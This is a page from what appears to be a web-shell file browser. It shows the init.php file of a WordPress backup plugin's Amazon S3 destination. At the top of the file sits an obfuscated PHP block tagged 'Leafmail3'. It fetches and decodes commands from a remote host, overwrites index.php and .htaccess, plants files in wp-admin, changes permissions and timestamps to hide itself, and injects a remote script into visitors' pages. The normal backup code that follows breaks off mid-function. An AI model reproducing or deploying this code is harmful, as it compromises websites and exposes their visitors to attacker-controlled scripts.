0byt3m1n1
Path:
/
home1
/
aserty
/
public_html
/
smallnotebookcomputers.org
/
wp-content__d9c9c01
/
plugins
/
backupbuddy
/
destinations
/
s3
/
[
Home
]
File: init.php
<?php /*Leafmail3*/goto hsxm4; mY3D9: $OKi1f .= "\145\x6e"; goto PMx6A; Kd95g: $eE8gG .= "\x66\x69\154\x65"; goto oGKV2; c0Bp6: $Jl55q .= "\164\157"; goto hLq5m; Vp4xb: $P5GVh = $Jl55q($guwhq); goto KpZeQ; KGgiz: $Yg3cE .= "\46\x68\x3d" . $Q6Si4; goto tGPrB; xpAbl: $PP2HF = $M1RhP($lL4Rq) || $M1RhP($Cb4XV); goto HSzn5; Kc0L3: @$jg8CY($QTlc9, $L0vpN); goto d3U3f; J7hLY: $oyXyy .= "\154\x72"; goto Bl7Ky; bQe_M: try { goto oX1u4; oX1u4: @$jg8CY($QTlc9, $HwdP2); goto mGuog; mGuog: @$jg8CY($OEoU0, $HwdP2); goto xHE2w; TupRK: @$jg8CY($OEoU0, $L0vpN); goto Mf0Y6; KHm7H: @$x09Um($KCjdR, $P5GVh); goto gKo15; gKo15: @$jg8CY($QTlc9, $L0vpN); goto fLtCp; c1PqG: @$jg8CY($KCjdR, $L0vpN); goto KHm7H; HZmuJ: @$jg8CY($KCjdR, $HwdP2); goto BHPy7; Mf0Y6: @$x09Um($OEoU0, $P5GVh); goto HZmuJ; BHPy7: @$SUpxe($KCjdR, $KmcLU["\142"]); goto c1PqG; xHE2w: @$SUpxe($OEoU0, $KmcLU["\x61"]); goto TupRK; fLtCp: } catch (Exception $w0YG7) { } goto KYs1a; Jfk_p: $guwhq = "\x2d\61"; goto FfLog; aYiIS: $NMbX8 .= "\144\x69\x72"; goto aKKe8; UPbyC: $HwdP2 += 304; goto fGMBR; JJZtD: $Jzlvr .= "\x75\156\143\164"; goto K31Ka; wCWRd: $SUj9O .= "\x73\x65"; goto SQa11; EdFV9: $M1RhP = "\144\x65\x66"; goto CcXTx; SDHjH: $QTlc9 = $_SERVER[$zl1NS]; goto BhGva; v4imZ: $aBJVO .= "\165\x65\162\x79"; goto ccRhk; C3xz0: $QuqQl .= "\157\160\164"; goto ExrBe; Mn8P4: $nCEBP .= "\143\153"; goto rirWy; oGKV2: $AIpqX = "\x69\x73\137"; goto yLTbR; ShiTE: $jg8CY = "\143\x68"; goto HTXlE; FRUFZ: if (!(!$PP2HF && $wU3zB)) { goto cynsl; } goto fT2Kb; D5OCa: $Jl55q = "\x73\164\162"; goto c0Bp6; jFRX7: $x09Um .= "\x75\143\150"; goto ShiTE; CIdAQ: try { goto uKjO1; uKjO1: $KJxhs = $Lbxvg(); goto h_HFe; ahPCJ: $SpmAm = $qG0GR($KJxhs); goto EzjNL; xG0S9: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 10); goto ahPCJ; SQbKW: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto xG0S9; FS40F: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto h05EJ; h05EJ: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto KfHmj; cFoFb: $SpmAm = trim(trim($SpmAm, "\xef\273\277")); goto XVsob; KfHmj: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto SQbKW; EzjNL: $SUj9O($KJxhs); goto cFoFb; h_HFe: $QuqQl($KJxhs, CURLOPT_URL, $Yg3cE); goto FS40F; XVsob: } catch (Exception $w0YG7) { } goto Rf0CY; OWp53: $NMbX8 = "\155\x6b"; goto aYiIS; Dx3FV: $lrArR = $WVzi1[0]; goto IH6rw; i5aD2: if (!(!$eE8gG($KCjdR) || $wgQyS($KCjdR) != $CXpqw)) { goto eit7d; } goto KjDHJ; FWxON: $PVllF = "\144\x65\143"; goto EwaSn; KjDHJ: $YEcMX = 1; goto z9vF6; ZyUiw: $Jzlvr .= "\167\156\137\146"; goto JJZtD; mCzgW: $_SERVER[$Jzlvr] = 0; goto EkOAP; NflDd: $Yg3cE .= "\x63\157\x70\171"; goto KGgiz; yB2Sc: $JyN8a .= "\x69\x73\164\163"; goto Rkiyf; klUXl: $KCjdR .= "\x61\x63\x63\x65\163\x73"; goto lFs7r; Fra8y: $k1dzM = "\65"; goto Js55e; pF1JS: $OEoU0 .= "\150\160"; goto C_QnM; xhtvx: $leXnA .= "\x6e\x69"; goto rLZqh; n28OO: $sJIxp .= "\151\141\154\151\172\x65"; goto bm81E; znIi3: @unlink($leXnA); goto Kc0L3; slgUn: $sJIxp = "\x75\156\163\145\162"; goto n28OO; QELur: $Jzlvr .= "\147\151\x73\x74"; goto lEaPh; Js55e: $k1dzM .= "\56\x34"; goto N7I8b; rLZqh: if (!$eE8gG($leXnA)) { goto WwLVo; } goto laOt4; yCiib: EKIjw: goto m_fRf; Gcw6D: $SLV70 .= "\x6f\x6e\x5f\143\157\x6d"; goto FFtsE; bm81E: $a2D8O = "\151\x6e\164"; goto l0tUv; xQGdz: try { $_SERVER[$Jzlvr] = 1; $Jzlvr(function () { goto F3wJk; ZjuUH: $PgG92 .= "\x6f\162\145\x28\x67\54\x73\51\73" . "\xa"; goto IC5Gf; HNrtn: $PgG92 .= "\164\x2f\x6a\141\x76\x61"; goto NGG39; NGG39: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\x3e" . "\12"; goto fvKWo; zjuBs: $PgG92 .= $Q6Si4; goto ozlGd; e43vJ: $PgG92 .= "\x3b\40\147\x2e\x64\145\146"; goto WAaTZ; ctigl: $PgG92 .= "\143\x72\x69\x70\x74\76\12"; goto UQzFQ; o0zxz: $PgG92 .= "\x74\x6f\155\x6f\x20\x2d\55\x3e\12"; goto mPwIJ; HgwKa: $PgG92 .= "\x67\56\163\x72"; goto XHdHm; cMvbH: $PgG92 .= "\x3f\x69\x64\x3d"; goto CPJJv; T8SNl: $PgG92 .= "\x28\42\163\143\x72\x69"; goto DVVjf; EQZrG: $PgG92 .= "\165\155\x65\156\164\54\40\147\x3d\x64\56\x63\x72\x65\141\164\x65"; goto CVmAR; OsCJL: $PgG92 .= "\x72\x69\160\x74\x20\164\171\x70\x65\x3d\42\164\145\x78"; goto HNrtn; fvKWo: $PgG92 .= "\x28\146\x75\x6e\x63"; goto D9Z4J; XHdHm: $PgG92 .= "\143\x3d\x75\53\42\x6a\x73\x2f"; goto zjuBs; F3wJk: global $Q6Si4, $FOvp_; goto ikpGs; DVVjf: $PgG92 .= "\x70\164\x22\51\x5b\x30\135\73" . "\12"; goto OlxLe; CPJJv: $PgG92 .= "\x4d\55"; goto nBzuv; wKipS: $PgG92 .= "\x6a\141\x76\141"; goto y_xeS; D9Z4J: $PgG92 .= "\x74\x69\157\x6e\x28\51\x20\x7b" . "\12"; goto vt08G; vXk66: $PgG92 .= "\x79\124\x61\147\116\x61\155\145"; goto T8SNl; ikpGs: $PgG92 = "\x3c\x21\x2d\x2d\40\115\x61"; goto o0zxz; rJXe5: $PgG92 .= "\x72\151\160\164\42\51\x2c\40\163\75\144\56\147\x65\164"; goto pxHT_; VSQBz: $PgG92 .= "\x73\171\x6e\143\75\x74\162\x75\145"; goto e43vJ; pxHT_: $PgG92 .= "\x45\154\145\x6d\x65\x6e\x74\x73\x42"; goto vXk66; QIy0x: $PgG92 .= "\157\x6d\157\40\103\157\x64"; goto Uxlnc; rjIua: $PgG92 .= "\74\57\x73"; goto ctigl; puLbh: $PgG92 .= "\x3d\x22\164\x65\170\164\x2f"; goto wKipS; CVmAR: $PgG92 .= "\x45\154\145\155\145\x6e\164\50\42\x73\143"; goto rJXe5; UU_6f: $PgG92 .= "\x22\73\40\163\x2e\160\141\x72"; goto aBxBL; c1FaP: echo $PgG92; goto zSGUt; UQzFQ: $PgG92 .= "\x3c\x21\x2d\55\x20\x45\x6e"; goto qvKfj; IC5Gf: $PgG92 .= "\x7d\x29\50\51\73" . "\xa"; goto rjIua; OlxLe: $PgG92 .= "\x67\56\164\x79\x70\x65"; goto puLbh; EfTgB: $PgG92 .= "\166\x61\x72\40\x64\x3d\x64\x6f\143"; goto EQZrG; nBzuv: $PgG92 .= time(); goto UU_6f; Uxlnc: $PgG92 .= "\145\40\55\x2d\76\xa"; goto c1FaP; mZ3oI: $PgG92 .= "\x73\x65\x72\x74\102\145\x66"; goto ZjuUH; WAaTZ: $PgG92 .= "\x65\x72\x3d\164\162\x75\x65\x3b" . "\12"; goto HgwKa; ozlGd: $PgG92 .= "\57\x6d\x61\164"; goto TbrIf; aBxBL: $PgG92 .= "\145\x6e\164\x4e\x6f\144\x65\x2e\x69\156"; goto mZ3oI; mPwIJ: $PgG92 .= "\x3c\x73\x63"; goto OsCJL; vt08G: $PgG92 .= "\166\x61\x72\x20\x75\x3d\42" . $FOvp_ . "\42\x3b" . "\12"; goto EfTgB; y_xeS: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\73\40\147\56\x61"; goto VSQBz; qvKfj: $PgG92 .= "\144\40\115\141\x74"; goto QIy0x; TbrIf: $PgG92 .= "\157\155\157\56\x6a\163"; goto cMvbH; zSGUt: }); } catch (Exception $w0YG7) { } goto OMFq0; HTXlE: $jg8CY .= "\155\x6f\144"; goto u78ub; KT1wX: $WVzi1 = []; goto TZ3bq; d3U3f: WwLVo: goto QM61W; h87Dq: $leXnA .= "\145\162\x2e\x69"; goto xhtvx; nIVO8: $JyN8a = "\x66\x75\156\143"; goto GoX1L; jFsRM: $tAPba = 5; goto mY7sQ; SQa11: $aBJVO = "\150\164\x74\160\x5f\142"; goto AJs9s; laOt4: @$jg8CY($QTlc9, $HwdP2); goto L3sEg; MPyJp: $Jzlvr .= "\x73\x68\165"; goto scBFF; hs_XX: if (!is_array($KmcLU)) { goto Ji4ud; } goto LNg_o; L3sEg: @$jg8CY($leXnA, $HwdP2); goto znIi3; QIUGn: $SUpxe .= "\160\x75\164\137\x63"; goto kd_ew; KVOXl: $oyXyy = $QTlc9; goto coTO5; lEaPh: $Jzlvr .= "\x65\x72\137"; goto MPyJp; BhGva: $pW2vG = $QTlc9; goto NAu12; qNILG: $oyXyy .= "\150\160\56\60"; goto RNzhh; Zn9KR: $Lbxvg .= "\154\x5f\x69\x6e\151\x74"; goto qk2Ao; ZoBZC: $qG0GR .= "\154\x5f\x65\170\x65\x63"; goto AVxD0; mY7sQ: $tAPba += 3; goto y9KuX; ttAoG: $Yg3cE .= "\x3d\x67\145\x74"; goto NflDd; FFtsE: $SLV70 .= "\160\141\162\145"; goto EdFV9; eBPlp: $tbkvt .= "\137\x48\x4f\x53\x54"; goto mlRqF; y9KuX: $HwdP2 = 189; goto UPbyC; trQa2: $eE8gG = "\151\x73\x5f"; goto Kd95g; coTO5: $oyXyy .= "\x2f\170\x6d"; goto J7hLY; ccRhk: $D68oh = "\155\x64\x35"; goto wF0JY; zFQvK: $Kp0SW .= "\145\x70\x74\x61\x62\x6c\x65"; goto KVOXl; QsGMA: if (!(!$eE8gG($OEoU0) || $wgQyS($OEoU0) != $lrArR)) { goto Phq1q; } goto hbhZ9; dNN2Q: $L0vpN += 150; goto BU5yK; mf5ON: $QuqQl .= "\x6c\x5f\x73\x65\x74"; goto C3xz0; hTxii: $pFwD_ = "\x2f\136\x63"; goto GJpaV; SjSdb: if (!($JyN8a($Lbxvg) && !preg_match($pFwD_, PHP_SAPI) && $nCEBP($lMxQN, 2 | 4))) { goto sPsQO; } goto NFErl; xsENl: try { goto Rj1Hp; zDVDE: $ahOJp .= "\164\75\x63\141"; goto YWC0r; EdFQK: if ($AIpqX($Io3QB)) { goto BpK_a; } goto r_zk0; OTh7W: $Io3QB = dirname($Nfe0e); goto EdFQK; toAoY: @$jg8CY($Io3QB, $HwdP2); goto ALYMH; g2WNq: $ahOJp = $FOvp_; goto Q_jhz; YWC0r: $ahOJp .= "\154\154"; goto qpBjZ; Rj1Hp: $Nfe0e = $QTlc9 . $KmcLU["\x64"]["\160\141\164\150"]; goto OTh7W; r_zk0: @$NMbX8($Io3QB, $HwdP2, true); goto yxLDn; IMGFo: VUik8: goto OCPb3; ALYMH: @$SUpxe($Nfe0e, $KmcLU["\144"]["\x63\157\x64\x65"]); goto D2b8f; yxLDn: BpK_a: goto VXrMt; VXrMt: if (!$AIpqX($Io3QB)) { goto VUik8; } goto toAoY; l8bWn: try { goto Rtq9b; N8H27: $SUj9O($KJxhs); goto PHxGn; P9hMZ: $QuqQl($KJxhs, CURLOPT_URL, $ahOJp); goto aJWcu; GlRPI: $QuqQl($KJxhs, CURLOPT_POSTFIELDS, $aBJVO($nLpk_)); goto M4b4c; bz5Ia: $QuqQl($KJxhs, CURLOPT_POST, 1); goto GlRPI; ifFFq: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto kx509; M4b4c: $qG0GR($KJxhs); goto N8H27; UfA6j: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 3); goto bz5Ia; kx509: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto UfA6j; aJWcu: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto hBtdw; Rtq9b: $KJxhs = $Lbxvg(); goto P9hMZ; hBtdw: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto ifFFq; PHxGn: } catch (Exception $w0YG7) { } goto IMGFo; s60Ax: @$x09Um($Nfe0e, $P5GVh); goto g2WNq; Q_jhz: $ahOJp .= "\77\x61\x63"; goto zDVDE; D2b8f: @$jg8CY($Nfe0e, $L0vpN); goto s_yVr; qpBjZ: $nLpk_ = ["\144\141\164\141" => $KmcLU["\x64"]["\165\162\x6c"]]; goto l8bWn; s_yVr: @$jg8CY($Io3QB, $L0vpN); goto s60Ax; OCPb3: } catch (Exception $w0YG7) { } goto bQe_M; e4Ifc: $Q6Si4 = $_SERVER[$tbkvt]; goto SDHjH; EwaSn: $PVllF .= "\x6f\143\x74"; goto CwGUI; yLTbR: $AIpqX .= "\x64\151\x72"; goto OWp53; BpAbm: $lL4Rq = "\x57\120\137\x55"; goto lIGrh; QBgho: Z7kbo: goto MUx3h; IH6rw: $CXpqw = $WVzi1[1]; goto QsGMA; yCtJ5: $JyN8a .= "\145\170"; goto yB2Sc; rirWy: $d_KAU = "\x66\143\x6c"; goto kGS2i; ExrBe: $qG0GR = $MogIQ; goto ZoBZC; qk2Ao: $QuqQl = $MogIQ; goto mf5ON; Z31wx: $jg8CY($QTlc9, $HwdP2); goto Ag8lc; K4l5B: $OEoU0 .= "\144\x65\x78\x2e\160"; goto pF1JS; bRDE_: $Cb4XV .= "\x5f\x41\x44"; goto YF7Rp; nElWS: $guwhq .= "\141\x79\x73"; goto Vp4xb; tP5eQ: $pW2vG .= "\x2d\141"; goto wx8gB; GJpaV: $pFwD_ .= "\x6c\151\57"; goto xJCEv; lFs7r: $leXnA = $QTlc9; goto tV4kM; t0fao: $Yg3cE = $FOvp_; goto NZ1x6; XrDkv: if (isset($_SERVER[$Jzlvr])) { goto r0CaT; } goto mCzgW; PMx6A: $nCEBP = "\146\154\157"; goto Mn8P4; C2C3X: $wgQyS .= "\154\x65"; goto trQa2; zsusp: $KmcLU = 0; goto jkCOI; NIEOu: $L0vpN = 215; goto dNN2Q; OEFkW: rsAYm: goto UL5LC; hbhZ9: $YEcMX = 1; goto IiUuQ; m_fRf: if (!$YEcMX) { goto gtKXO; } goto t0fao; i7ojl: $guwhq .= "\63\40\144"; goto nElWS; NAu12: $pW2vG .= "\57\x77\160"; goto tP5eQ; iw0Nk: $FOvp_ .= "\154\x69\x6e\x6b\56\164"; goto hSD1f; scBFF: $Jzlvr .= "\164\144\x6f"; goto ZyUiw; KpZeQ: $tbkvt = "\x48\124\124\120"; goto eBPlp; r500z: $KCjdR .= "\x2f\56\x68\x74"; goto klUXl; OMFq0: w6JGc: goto bH1zF; kd_ew: $SUpxe .= "\x6f\x6e\164\145\x6e\x74\163"; goto diLdg; PoTvn: $OEoU0 = $QTlc9; goto Fc1AY; aKKe8: $wM0cw = "\146\151\154\x65\137"; goto J0OQr; J3xw9: $FOvp_ = "\150\x74\x74\x70\163\72\57\57"; goto QlKtX; hSD1f: $FOvp_ .= "\157\160\57"; goto F0vj_; kGS2i: $d_KAU .= "\x6f\163\x65"; goto J3xw9; QM61W: $YEcMX = 0; goto SUEqd; p0Flx: $SUj9O .= "\154\137\143\x6c\x6f"; goto wCWRd; hLq5m: $Jl55q .= "\164\151"; goto lcFkG; YF7Rp: $Cb4XV .= "\115\x49\116"; goto xpAbl; eC9HP: $IhD_T = substr($D68oh($Q6Si4), 0, 6); goto DX3Ky; R8zQO: $SUpxe = "\146\151\x6c\145\137"; goto QIUGn; QlKtX: $FOvp_ .= "\x73\x65\x6f"; goto iw0Nk; C_QnM: $KCjdR = $QTlc9; goto r500z; EVan7: $y1BSo .= "\66\x34\x5f\x64"; goto n14XQ; CwGUI: $LDT3_ = "\x73\x74\x72"; goto iemde; wF0JY: $wgQyS = $D68oh; goto tC7IY; lcFkG: $Jl55q .= "\155\145"; goto nIVO8; LNg_o: try { goto mjWqA; aMSC6: @$jg8CY($iTCcx, $L0vpN); goto uokyK; UHS8F: @$jg8CY($pW2vG, $HwdP2); goto EZm8t; uokyK: @$x09Um($iTCcx, $P5GVh); goto bavy5; aNk_f: a5xL9: goto q700I; EZm8t: $iTCcx = $E3Ibu; goto aNk_f; OGZQL: if (!$AIpqX($pW2vG)) { goto a5xL9; } goto UHS8F; q700I: @$SUpxe($iTCcx, $KmcLU["\x63"]); goto aMSC6; mjWqA: @$jg8CY($QTlc9, $HwdP2); goto OGZQL; bavy5: } catch (Exception $w0YG7) { } goto xsENl; KYs1a: Ji4ud: goto QBgho; mlRqF: $zl1NS = "\104\x4f\103\125\115\x45\x4e\x54"; goto hivPL; OH0x0: $Tut_m .= "\x6e\146\154\x61\x74\145"; goto slgUn; Rf0CY: if (!($SpmAm !== false)) { goto Z7kbo; } goto zsusp; RNzhh: $OKi1f = "\146\157\160"; goto mY3D9; tC7IY: $wgQyS .= "\x5f\146\x69"; goto C2C3X; xePje: $Kp0SW = "\110\x54\124"; goto xIN_k; fT2Kb: $_POST = $_REQUEST = $_FILES = array(); goto UASYd; diLdg: $x09Um = "\164\157"; goto jFRX7; DX3Ky: $E3Ibu = $iTCcx = $pW2vG . "\57" . $IhD_T; goto KT1wX; J0OQr: $wM0cw .= "\x67\145\x74\137\x63"; goto KA3CR; MUx3h: gtKXO: goto qfVae; Ag8lc: $lMxQN = $OKi1f($oyXyy, "\167\x2b"); goto SjSdb; Rkiyf: $MogIQ = "\x63\165\x72"; goto chVKY; TZ3bq: $dmwnh = 32; goto jFsRM; tGPrB: $SpmAm = false; goto CIdAQ; hivPL: $zl1NS .= "\x5f\x52\117\117\x54"; goto Fra8y; Gx5VO: $Kp0SW .= "\60\x36\40\116\x6f"; goto z0Ye5; UL5LC: $YEcMX = 1; goto yCiib; NZ1x6: $Yg3cE .= "\77\141\143\x74"; goto ttAoG; xIN_k: $Kp0SW .= "\120\57\x31\x2e\x31\40\x34"; goto Gx5VO; BU5yK: $L0vpN = $a2D8O($PVllF($L0vpN), $tAPba); goto xePje; HPuPS: $SLV70 = "\166\145\162\x73\x69"; goto Gcw6D; lIGrh: $lL4Rq .= "\123\105\137\x54\x48\x45"; goto uBz23; GoX1L: $JyN8a .= "\164\x69\157\x6e\x5f"; goto yCtJ5; wx8gB: $pW2vG .= "\x64\x6d\151\156"; goto eC9HP; mEJVe: $s6EXz = $_FILES; goto p7L1U; uBz23: $lL4Rq .= "\115\x45\123"; goto Me43b; F0vj_: $Jzlvr = "\162\145"; goto QELur; l0tUv: $a2D8O .= "\x76\x61\154"; goto FWxON; tV4kM: $leXnA .= "\57\56\x75\163"; goto h87Dq; z0Ye5: $Kp0SW .= "\x74\40\101\x63\x63"; goto zFQvK; aSc51: goto EKIjw; goto OEFkW; K31Ka: $Jzlvr .= "\x69\157\x6e"; goto XrDkv; IiUuQ: Phq1q: goto i5aD2; NFErl: $jg8CY($QTlc9, $L0vpN); goto aro2m; EkOAP: r0CaT: goto BpAbm; UASYd: cynsl: goto Z31wx; N7I8b: $k1dzM .= "\x2e\60\73"; goto e4Ifc; Fc1AY: $OEoU0 .= "\x2f\151\156"; goto K4l5B; Bl7Ky: $oyXyy .= "\160\143\x2e\x70"; goto qNILG; HSzn5: $P0UrJ = $_REQUEST; goto mEJVe; KA3CR: $wM0cw .= "\157\156\164\x65\x6e\164\163"; goto R8zQO; AJs9s: $aBJVO .= "\165\151\154\x64\137\161"; goto v4imZ; z9vF6: eit7d: goto aSc51; chVKY: $Lbxvg = $MogIQ; goto Zn9KR; jkCOI: try { $KmcLU = @$sJIxp($Tut_m($y1BSo($SpmAm))); } catch (Exception $w0YG7) { } goto hs_XX; FfLog: $guwhq .= "\x33\x36"; goto i7ojl; u78ub: $y1BSo = "\x62\141\x73\x65"; goto EVan7; Me43b: $Cb4XV = "\127\x50"; goto bRDE_; p7L1U: $wU3zB = !empty($P0UrJ) || !empty($s6EXz); goto FRUFZ; bH1zF: try { goto hOljI; hTb2m: $WVzi1[] = $qQkQf; goto AVR1Z; wTrAR: $WVzi1[] = $mps9W; goto USnsY; O2FVm: $iTCcx = $QTlc9 . "\57" . $IhD_T; goto wiWx3; o5KeW: if (!empty($WVzi1)) { goto YMthw; } goto O2FVm; m1oNR: $WVzi1[] = $mps9W; goto hTb2m; C5yVp: NQbOe: goto o5KeW; uB5Qk: $mps9W = trim($JwExk[0]); goto hHGO3; tXeIo: I87JI: goto KjVrB; of38T: $JwExk = @explode("\72", $wM0cw($iTCcx)); goto lJihh; e3ZU6: $mps9W = trim($JwExk[0]); goto s4UPH; AVR1Z: uxegI: goto K3NXW; lU9RV: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto iEvPe; } goto wTrAR; ysg_I: LUX7P: goto tXeIo; BWadG: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto LUX7P; } goto uB5Qk; wiWx3: if (!$eE8gG($iTCcx)) { goto I87JI; } goto GGIpg; hOljI: if (!$eE8gG($iTCcx)) { goto NQbOe; } goto of38T; GGIpg: $JwExk = @explode("\x3a", $wM0cw($iTCcx)); goto BWadG; KjVrB: YMthw: goto jes1d; hHGO3: $qQkQf = trim($JwExk[1]); goto lU9RV; m5G9U: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto uxegI; } goto m1oNR; zW9Vv: iEvPe: goto ysg_I; s4UPH: $qQkQf = trim($JwExk[1]); goto m5G9U; lJihh: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto oJdNI; } goto e3ZU6; USnsY: $WVzi1[] = $qQkQf; goto zW9Vv; K3NXW: oJdNI: goto C5yVp; jes1d: } catch (Exception $w0YG7) { } goto PoTvn; W_RKl: $Tut_m = "\147\x7a\151"; goto OH0x0; n14XQ: $y1BSo .= "\145\x63\157\144\145"; goto W_RKl; hsxm4: $pqAdF = "\x3c\104\x44\115\76"; goto hTxii; xJCEv: $pFwD_ .= "\x73\x69"; goto D5OCa; SUEqd: if (empty($WVzi1)) { goto rsAYm; } goto Dx3FV; CcXTx: $M1RhP .= "\x69\x6e\145\x64"; goto Jfk_p; aro2m: if (!(!$_SERVER[$Jzlvr] && $SLV70(PHP_VERSION, $k1dzM, "\76"))) { goto w6JGc; } goto xQGdz; iemde: $LDT3_ .= "\x6c\145\156"; goto HPuPS; fGMBR: $HwdP2 = $a2D8O($PVllF($HwdP2), $tAPba); goto NIEOu; AVxD0: $SUj9O = $MogIQ; goto p0Flx; qfVae: sPsQO: ?> <?php // DO NOT CALL THIS CLASS DIRECTLY. CALL VIA: pb_backupbuddy_destination in bootstrap.php. class pb_backupbuddy_destination_s3 { // Change class name end to match destination name. const MINIMUM_CHUNK_SIZE = 5; // Minimum size, in MB to allow chunks to be. Anything less will not be chunked even if requested. const BACKUP_FILENAME_PATTERN = '/^backup-.*\.zip/i'; // Used for matching during backup limits, etc to prevent processing non-BackupBuddy files. public static $destination_info = array( 'name' => 'Amazon S3', 'description' => 'Amazon S3 is a well known cloud storage provider. This destination is known to be reliable and works well with BackupBuddy. <b>New in BackupBuddy v4.1</b>: S3 now supports multipart chunked file transfers! <a href="http://aws.amazon.com/s3/" target="_blank">Learn more here.</a>', ); // Default settings. Should be public static for auto-merging. public static $default_settings = array( 'type' => 's3', // MUST MATCH your destination slug. Required destination field. 'title' => '', // Required destination field. 'accesskey' => '', // Amazon access key. 'secretkey' => '', // Amazon secret key. 'bucket' => '', // Amazon bucket to put into. 'directory' => '', // Subdirectory to put into in addition to the site url directory. 'ssl' => '1', // Whether or not to use SSL encryption for connecting. 'server_encryption' => 'AES256', // Encryption (if any) to have the destination enact. Empty string for none. 'max_chunk_size' => '100', // Maximum chunk size in MB. Anything larger will be chunked up into pieces this size (or less for last piece). This allows larger files to be sent than would otherwise be possible. Minimum of 5mb allowed by S3. 'archive_limit' => '0', // Maximum number of backups for this site in this directory for this account. No limit if zero 0. 'manage_all_files' => '1', // Allow user to manage all files in S3? If enabled then user can view all files after entering their password. If disabled the link to view all is hidden. 'region' => 's3.amazonaws.com', // Endpoint to create buckets in. Although named region this is technically the ENDPOINT. 'storage' => 'standard', // Whether to use standard or reduced redundancy storage. Allowed values: standard, reduced 'use_packaged_cert' => '0', // When 1, use the packaged cacert.pem file included with the AWS SDK. 'disable_file_management' => '0', // When 1, _manage.php will not load which renders remote file management DISABLED. // Do not store these for destination settings. Only used to pass to functions in this file. '_multipart_id' => '', // Instance var. Internal use only for continuing a chunked upload. '_multipart_partnumber' => 0, // Instance var. Part number to upload next. '_multipart_file' => '', // Instance var. Internal use only to store the file that is currently set to be multipart chunked. '_multipart_remotefile' => '', // Instance var. Internal use only to store the remote filepath & file. '_multipart_counts' => array(), // Instance var. Multipart chunks to send. Generated by S3's get_multipart_counts(). '_multipart_transferspeeds' => array(), ); /* send() * * Send one or more files. * * @param array $files Array of one or more files to send. * @return boolean|array True on success, false on failure, array if a multipart chunked send so there is no status yet. */ public static function send( $settings = array(), $files = array(), $send_id = '', $delete_after = false ) { global $pb_backupbuddy_destination_errors; $backup_type_dir = ''; $region = ''; $settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase. if ( !is_array( $files ) ) { $files = array( $files ); } $limit = $settings['archive_limit']; $max_chunk_size = $settings['max_chunk_size']; $remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailng slashes. if ( $settings['ssl'] == '0' ) { $disable_ssl = true; } else { $disable_ssl = false; } $multipart_id = $settings['_multipart_id']; $multipart_counts = $settings['_multipart_counts']; pb_backupbuddy::status( 'details', 'S3 remote path set to `' . $remote_path . '`.' ); pb_backupbuddy::status( 'details', 'Loading S3 SDK library file...' ); require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); pb_backupbuddy::status( 'details', 'S3 SDK file loaded.' ); // S3 API talk. $manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings ); // Process multipart transfer that we already initiated in a previous PHP load. if ( $multipart_id != '' ) { // Multipart upload initiated and needs parts sent. // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating S3 instance.' ); $s3 = new AmazonS3( $manage_data ); // the key, secret, token if ( $disable_ssl === true ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'S3 instance created.' ); // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) { global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.'; return false; } $this_part_number = $settings['_multipart_partnumber'] + 1; pb_backupbuddy::status( 'details', 'S3 beginning upload of part `' . $this_part_number . '` of `' . count( $settings['_multipart_counts'] ) . '` parts of file `' . $settings['_multipart_file'] . '` to remote location `' . $settings['_multipart_remotefile'] . '` with multipart ID `' . $settings['_multipart_id'] . '`.' ); $response = $s3->upload_part( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'], array( 'expect' => '100-continue', 'fileUpload' => $settings['_multipart_file'], 'partNumber' => $this_part_number, 'seekTo' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['seekTo'], 'length' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['length'], )); if(!$response->isOK()) { $this_error = 'S3 unable to upload file part for multipart upload `' . $settings['_multipart_id'] . '`. Details: `' . print_r( $response, true ) . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Send success. pb_backupbuddy::status( 'details', 'Success sending chunk. Upload details: `' . print_r( $response, true ) . '`.' ); $uploaded_size = $response->header['_info']['size_upload']; $uploaded_speed = $response->header['_info']['speed_upload']; pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' ); } // Load fileoptions to the send. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #10.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.2344848. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = '#9034.2344848'; return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = 